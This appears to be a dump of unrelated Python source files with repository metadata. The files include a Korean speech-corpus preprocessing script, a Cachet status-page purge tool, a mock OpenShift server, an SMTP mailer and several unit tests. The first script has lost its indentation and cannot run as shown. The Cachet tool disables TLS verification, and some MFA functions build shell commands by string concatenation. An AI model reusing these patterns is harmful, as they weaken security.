            # the new wav_name must be used as-is here
if new_wav_name[:len(new_speaker_name)] != wav:
if new_wav_name[:len(new_speaker_name)] == new_speaker_name:
new_wav_name = new_wav_name + wav[-(len(format)+1):]
else:
new_wav_name = new_speaker_name + new_wav_name + wav[-(len(format)+1):]
os.rename(wav, new_wav_name)
temp+=1; cnt +=1
os.chdir('../')
os.rename(speaker, new_speaker_name)
print(cnt,'All Done', end='\n\n')
os.chdir('../')
def json_to_transcripts():
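    # Build <name>_transcript.txt: one '|'-separated line per utterance with the wav path,
    # the text (twice), the NFD-decomposed text, the duration, and 'None'.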
speakers = os.listdir(json_label_dir)
speakers.sort()
print(len(speakers), "speaker's are Sorted.")
os.chdir(json_label_dir)
utterance_text = []
cnt = 1
for speaker in speakers:
for file in os.listdir(speaker):
if cnt % 1000 == 0:
print(cnt, 'Done')
utterance_set = []
with open(os.path.join(speaker, file)) as f:
json_data = json.load(f)
utterance_set.append(file[:-4] + 'wav')
utterance_set.append(line_replace(json_data['발화정보']['stt']))
sep_text = unicodedata.normalize('NFD',line_replace(json_data['발화정보']['stt']))
utterance_set.append(sep_text)
utterance_set.append(round(float(json_data['발화정보']['recrdTime']),1))
utterance_text.append(utterance_set)
cnt+=1
print(cnt-1, 'All Done')
os.chdir('../')
with open(transcript, "w") as file:
for utt in utterance_text:
file.write(utt[0][:6] + '/' + utt[0] + '|' + utt[1] + '|' + utt[1] + '|' + utt[2] + '|' + str(utt[3]) + '|' + 'None\n')
def line_replace(line):
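    # Strip annotation tags (SP/SN/NO), punctuation, and stray characters from a
    # transcript line, and collapse double spaces.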
line = line.replace('(SP:)', '')
line = line.replace('(SP:', '')
line = line.replace('(SN:)', '')
line = line.replace('(SN:', '')
line = line.replace('(NO:)', '')
line = line.replace('(NO:', '')
line = line.replace('spn', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('毛', '')
line = line.replace(')', '')
line = line.replace('(', '')
line = line.replace('"', '')
line = line.replace('.', '')
line = line.replace('[', '')
line = line.replace(',', '')
line = line.replace('!', '')
line = line.replace('?', '')
line = line.replace(']', '')
line = line.replace('.', '')
line = line.replace(' ', ' ')
return line
def aligner():
filters = '([.,!?])"'
file_list = []
with open(transcript, 'r', encoding='utf-8') as f:
for line in f.readlines():
temp = line.split('|')
file_dir, script = temp[0], temp[3]
script = re.sub(re.compile(filters), '', script)
            script = line_replace(script)  # !!! the crucial character stripping happens here
            # file_dir = file_dir.split('/')  # in case of splitting per folder
fn = file_dir[:-3] + 'lab'
file_dir = os.path.join(data_dir, fn)
#print(file_dir)
with open(file_dir, 'w', encoding='utf-8') as f:
f.write(script)
file_list.append(os.path.join(file_dir))
jamo_dict = {}
for file_name in tqdm(file_list):
sentence = open(file_name, 'r', encoding='utf-8').readline()
jamo = h2j(sentence).split(' ')
for i, s in enumerate(jamo):
if s not in jamo_dict:
jamo_dict[s] = ' '.join(jamo[i])
with open(dict_name, 'w', encoding='utf-8') as f:
for key in jamo_dict.keys():
content = '{}\t{}\n'.format(key, jamo_dict[key])
f.write(content)
print("Aligner Done\n")
def mfa_train():
print("MFA Training Start.. \n")
os.system('mfa train_g2p ' + dict_name + ' ' + name + '_korean.zip --clear')
print("MFA train_g2p Done\n")
os.system('mfa g2p ' + name + '_korean.zip ' + data_dir + ' ' + name + '_korean.txt')
print("MFA g2p Done\n")
os.system('mfa train ' + data_dir + ' ' + name + '_korean.txt ./textgrids --clean')
os.system('mv ~/Documents/MFA/wavs_train_acoustic_model/sat_2_ali/textgrids ./')
os.system('zip -r textgrids.zip textgrids')
    os.system('mv textgrids.zip ' + first_dir)  # move it to the main dir
print("MFA Training Done! \n")
def lab_separate():
speaker_list = os.listdir('wavs')
os.mkdir('lab')
for speaker in speaker_list:
os.mkdir('lab/' + speaker)
lab_list = os.listdir(os.path.join('wavs', speaker))
for lab in lab_list:
if lab[-3:] == 'lab':
os.system('mv ' 'wavs/' + speaker + '/' + lab + ' lab/' + speaker)
if __name__ == '__main__':
os.chdir('dataset/' + hp.dataset)
change_name('wavs', 'wav')
#change_name('label', 'json')
#json_to_transcripts()
aligner()
mfa_train()
lab_separate()
| 31.910891
| 135
| 0.51691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,248
| 0.191001
|
65cb00b6e400d3acf13ccac0a2014cd803772f2a
| 1,435
|
py
|
Python
|
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | null | null | null |
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | 3
|
2020-01-02T13:04:07.000Z
|
2020-02-05T14:18:50.000Z
|
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | 5
|
2019-11-07T20:55:05.000Z
|
2020-07-15T13:59:07.000Z
|
#!/usr/bin/env python3
import requests
import os
import json
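# Expects CACHET_HOSTNAME and CACHET_TOKEN in the environment; TLS certificate
# verification is disabled on every request.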
CACHET_HOSTNAME = os.environ.get("CACHET_HOSTNAME")
URL = f"https://{CACHET_HOSTNAME}/api/v1/components"
HEADERS = {
'X-Cachet-Token': os.environ.get("CACHET_TOKEN")
}
with requests.Session() as session:
session.headers.update(HEADERS)
response = session.get(URL + "/groups", verify=False)
groups = response.json()['data']
print("Number of groups found: " + str(len(groups)))
for group in groups:
components = group['enabled_components']
print(group['name'] + " contains " + str(len(components)) + " components")
for component in components:
print("Deleting component: " + component['name'])
cdr = session.delete(URL + "/" + str(component['id']), verify=False, )
print (cdr)
# delete the group
print("Deleting group " + group['name'])
gdr = session.delete(URL + "/groups/" + str(group['id']), verify=False, )
print(gdr)
# check and delete components not in any groups
response = session.get(URL, verify=False)
components = response.json()['data']
print("Number of components not in any group: " + str(len(components)))
for component in components:
print("Deleting component: " + component['name'])
cdr = session.delete(URL + "/" + str(component['id']), verify=False, )
print (cdr)
print("Done!!!")
| 33.372093
| 82
| 0.622997
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 435
| 0.303136
|
65cb24c821d26b2c77253d1d9836328c541460bf
| 489
|
py
|
Python
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | 3
|
2020-07-19T15:46:48.000Z
|
2021-08-02T21:58:49.000Z
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | 30
|
2020-05-12T11:07:47.000Z
|
2022-02-27T12:54:08.000Z
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | null | null | null |
import numpy as np
from mpmath import besselj, mpf, pi, sqrt
from ..funcs import j1_over_x
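# Reference value: the spherical Bessel function j_i(x)/x, computed from the
# half-integer-order Bessel J via mpmath.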
@np.vectorize
def mpmath_jn_over_x(i, x):
xx = mpf(x)
if x == 0:
return float(1 / mpf(3))
else:
return float(sqrt(pi / mpf(2) / xx) * besselj(i + mpf("1/2"), xx) / xx)
def test_j1_over_x():
x = np.concatenate(([0], np.geomspace(1e-8, 10, 1000)))
yref = mpmath_jn_over_x(1, x)
yval = j1_over_x(x)
np.testing.assert_allclose(yref, yval, rtol=1e-14)
| 21.26087
| 79
| 0.615542
| 0
| 0
| 0
| 0
| 195
| 0.398773
| 0
| 0
| 5
| 0.010225
|
65cb50fe55b88d486a160d6a37760bb1772d7906
| 2,176
|
py
|
Python
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 12
|
2015-02-19T20:09:04.000Z
|
2021-12-25T13:52:17.000Z
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 102
|
2015-08-03T14:07:46.000Z
|
2022-02-18T19:56:55.000Z
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 3
|
2016-05-12T15:03:16.000Z
|
2019-07-31T14:38:24.000Z
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2016 France-IOI, MIT license
#
# http://opensource.org/licenses/MIT
# This tool launches an isolated execution. It is intended as a wrapper around
# the execution of any command.
import argparse, os, sys
DEFAULT_EXECPARAMS = {
'timeLimitMs': 60000,
'memoryLimitKb': 128*1024,
'useCache': False,
'stdoutTruncateKb': -1,
'stderrTruncateKb': -1,
'getFiles': []
}
# Add taskgrader folder to PATH
SELFDIR = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(SELFDIR, '../'))
from taskgrader import IsolatedExecution
if __name__ == '__main__':
    argParser = argparse.ArgumentParser(description="Launches an isolated execution of a command, wrapping it with time and memory limits.")
argParser.add_argument('-i', '--stdin', help='Set file to pass on stdin.')
argParser.add_argument('-m', '--memory-limit', help='Set memory limit for execution, in kilobytes.', type=int)
argParser.add_argument('-t', '--time-limit', help='Set time limit for execution, in milliseconds.', type=int)
argParser.add_argument('-p', '--path', help='Set the working directory for the execution.', default='.')
argParser.add_argument('args', nargs=argparse.REMAINDER)
args = argParser.parse_args()
# Check cmd line
if not args.args:
argParser.error("No command specified.")
if '--' in args.args: args.args.remove('--')
# Set up execution parameters
execParams = {}
execParams.update(DEFAULT_EXECPARAMS)
if args.memory_limit: execParams['memoryLimitKb'] = args.memory_limit
if args.time_limit: execParams['timeLimitMs'] = args.time_limit
# Prepare files
cmdLine = ' '.join(args.args)
stdoutPath = os.path.join(args.path, 'isolate-run.stdout')
# Launch the isolated execution
execution = IsolatedExecution(None, execParams, cmdLine)
report = execution.execute(args.path, stdinFile=args.stdin, stdoutFile=stdoutPath)
sys.stdout.write(open(stdoutPath, 'r').read())
sys.stderr.write(report['stderr']['data'])
sys.exit(report['exitCode'])
| 35.672131
| 168
| 0.696691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 923
| 0.424173
|
65cc242de89c19efa4090dc93f9caa33777e25e0
| 837
|
py
|
Python
|
monitor/monitorlibs/sendemail.py
|
vaedit/-
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | 1
|
2021-04-09T05:47:42.000Z
|
2021-04-09T05:47:42.000Z
|
monitor/monitorlibs/sendemail.py
|
vaedit/python-monitor-script
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | null | null | null |
monitor/monitorlibs/sendemail.py
|
vaedit/python-monitor-script
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import smtplib
from email.mime.text import MIMEText
from email.header import Header
# send notification email
def smail(sub,body):
tolist = ["xx@qq.com", "xx@qq.com"]
cc = ["xx@qq.com", "xx@163.com"]
    sender = 'Administrator <worktest2020@163.com>'
subject = sub
smtpserver = 'smtp.163.com'
username = 'xx@163.com'
password = 'xxx'
messages = body
msg = MIMEText(messages, 'plain', 'utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = sender
msg['To'] = ','.join(tolist)
msg['Cc'] = ','.join(cc)
try:
s = smtplib.SMTP()
s.connect(smtpserver, '25')
s.login(username, password)
s.sendmail(sender, tolist+cc, msg.as_string())
s.quit()
        print 'Email sent successfully'
    except Exception as e:
        print 'Failed to send email: %s' % e
| 26.15625
| 54
| 0.577061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 271
| 0.307605
|
65ccdd74df24a36712a75efa27299093b23c6844
| 583
|
py
|
Python
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
from collections import deque
n, m = map(int, readline().split())
s = readline().rstrip().decode()[::-1]
index = 0
ans = deque([])
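# Greedy over the reversed string: repeatedly take the largest jump of at most m
# that lands on a '0'; if no such jump exists the answer is -1.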
for i in range(n):
for j in range(m, 0, -1):
if index + j >= n:
ans.appendleft(n - index)
print(*ans)
exit()
if s[index + j] == '0':
ans.appendleft(j)
index += j
break
else:
print(-1)
exit()
| 22.423077
| 38
| 0.538593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.005146
|
65cd5a403032e83361e632b7cbcf870eef107bce
| 1,790
|
py
|
Python
|
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | 8
|
2019-04-26T04:09:40.000Z
|
2022-01-04T05:24:12.000Z
|
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | null | null | null |
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | 2
|
2019-12-16T15:34:57.000Z
|
2020-10-22T07:03:15.000Z
|
"""Unit test to test app."""
import os
from unittest import TestCase
import mock
from src import app
class TestApp(TestCase):
"""Unit test class to test other methods in the app."""
def test_valid_env(self):
key = 'ENV_1'
os.environ[key] = 'test'
app.get_or_raise(key)
del os.environ[key]
def test_invalid_env(self):
with self.assertRaises(RuntimeError):
app.get_or_raise('ENV_2')
def test_valid_bool(self):
self.assertEqual(app.str_to_bool('True'), True)
self.assertEqual(app.str_to_bool('t'), True)
self.assertEqual(app.str_to_bool('1'), True)
self.assertEqual(app.str_to_bool('YES'), True)
def test_invalid_bool(self):
self.assertEqual(app.str_to_bool(''), False)
self.assertEqual(app.str_to_bool('test'), False)
def test_invalid_format(self):
self.assertEqual(app.str_to_bool(True), None)
@mock.patch('src.app.prepare_avd')
@mock.patch('subprocess.Popen')
    def test_run_with_appium(self, mocked_subprocess, mocked_avd):
with mock.patch('src.app.appium_run') as mocked_appium:
os.environ['APPIUM'] = str(True)
app.run()
self.assertTrue(mocked_avd.called)
self.assertTrue(mocked_subprocess.called)
self.assertTrue(mocked_appium.called)
@mock.patch('src.app.prepare_avd')
@mock.patch('subprocess.Popen')
    def test_run_without_appium(self, mocked_subprocess, mocked_avd):
with mock.patch('src.app.appium_run') as mocked_appium:
os.environ['APPIUM'] = str(False)
app.run()
self.assertTrue(mocked_avd.called)
self.assertTrue(mocked_subprocess.called)
self.assertFalse(mocked_appium.called)
| 32.545455
| 70
| 0.653073
| 1,684
| 0.940782
| 0
| 0
| 844
| 0.471508
| 0
| 0
| 262
| 0.146369
|
65cdd034fed36877b4031f60332f1c40cdb5f6a5
| 2,224
|
py
|
Python
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 8
|
2018-07-20T02:32:39.000Z
|
2022-03-27T10:52:55.000Z
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 167
|
2017-12-19T14:33:35.000Z
|
2022-03-22T11:47:20.000Z
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 52
|
2017-12-18T13:55:24.000Z
|
2022-02-09T14:07:14.000Z
|
#!/usr/bin/python3
import os
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
class MyHandler(BaseHTTPRequestHandler):
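    # Replays canned JSON fixtures for specific OpenShift deploymentconfig API paths;
    # GET /halt stops the server, and PATCH/PUT/DELETE always answer 200.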
def do_GET(self):
# do not change paths
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs?labelSelector=services.server.kie.org%2Fkie-server-id%3Drhpam-kieserevr-scale-up':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/kieserver-dc.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
# do not change paths
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs?labelSelector=services.server.kie.org%2Fkie-server-id%3Drhpam-kieserevr-scale-down':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/kieserver-dc-0-replicas.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs/rhpam-central-console':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/bc-dc.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
if self.path == '/halt':
print("Halting server")
self.send_response(200)
self.end_headers()
sys.exit()
# for patch method, only return 200 for any path
def do_PATCH(self):
self.send_response(200)
# for put method, only return 200 for any path
def do_PUT(self):
self.send_response(200)
    # for delete method, only return 200 for any path
def do_DELETE(self):
self.send_response(200)
httpd = HTTPServer(("localhost", 8080), MyHandler)
httpd.serve_forever()
| 37.694915
| 179
| 0.642536
| 2,045
| 0.919514
| 0
| 0
| 0
| 0
| 0
| 0
| 850
| 0.382194
|
65cff554030214e04d5a8a2df9a42dced600b89e
| 11,487
|
py
|
Python
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 356
|
2019-11-22T10:37:22.000Z
|
2022-03-25T14:42:45.000Z
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 52
|
2020-01-20T16:51:36.000Z
|
2022-03-31T21:40:19.000Z
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 48
|
2019-12-11T09:29:30.000Z
|
2022-03-18T17:51:55.000Z
|
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import random
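# Equivariance tests for the nonlinearity modules under dihedral and O(2)
# (flip + rotation) symmetry groups.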
class TestNonLinearitiesFlipRotations(TestCase):
def test_dihedral_norm_relu(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_dihedral_norm_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_dihedral_pointwise_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_dihedral_pointwise_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_dihedral_gated_one_input_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_all_shuffled(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated).sorted()
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_concat_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'concatenated' in r.supported_nonlinearities]
for rep in reprs:
r = FieldType(g, [rep])
nnl = ConcatenatedNonLinearity(r, function='c_relu')
nnl.check_equivariance()
def test_dihedral_induced_norm_relu(self):
N = 9
g = FlipRot2dOnR2(N)
sg_id = (None, N)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, int(N // 2))] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 7)] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_gated(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
reprs = [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 3)] * 5
ngates = len(reprs)
reprs += [g.induced_repr(sg_id, so2.trivial_representation)] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = InducedGatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_norm_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_o2_pointwise_relu(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_o2_pointwise_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_o2_gated_one_input_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_all_shuffled(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_two_inputs_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_o2_gated_two_inputs_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gated = FieldType(g, gated).sorted()
gates = FieldType(g, gates)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated1_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r, g.trivial_repr])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
r1 = FieldType(g, [g.trivial_repr, r])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
def test_dihedral_gated2_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
gates = FieldType(g, [g.trivial_repr])
gated = FieldType(g, [r])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
gates = FieldType(g, [r])
gated = FieldType(g, [g.trivial_repr])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
def test_dihedral_norm_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'norm' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, NormNonLinearity, r1)
def test_dihedral_pointwise_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'pointwise' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, PointwiseNonLinearity, r1)
def test_dihedral_concat_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'concatenated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, ConcatenatedNonLinearity, r1)
if __name__ == '__main__':
unittest.main()
| 30.149606
| 107
| 0.572038
| 11,322
| 0.985636
| 0
| 0
| 0
| 0
| 0
| 0
| 412
| 0.035867
|
65d01a4d1ad87624330d3bcc5a359ecdd7b3f0fa
| 5,880
|
py
|
Python
|
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
import unittest
from QuattroComponents.Player import Anonymous_player
from QuattroComponents.Card import Card
from TestModule.GetMethodName import get_method_name_decorator
from collections import deque
def reset_player_attributes(anonymous: Anonymous_player):
anonymous.player1_changed = False
anonymous.player2_changed = False
class AnonymousPlayerTest(unittest.TestCase):
    # the concrete value of this card does not matter for these tests
origin_card = Card(number=1, color="green", isOpen=False)
method_names = set()
@get_method_name_decorator
def test_correct_zero_card_change(self):
# Zero idx 0
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=0, color="zero", isOpen=False),
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 1
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
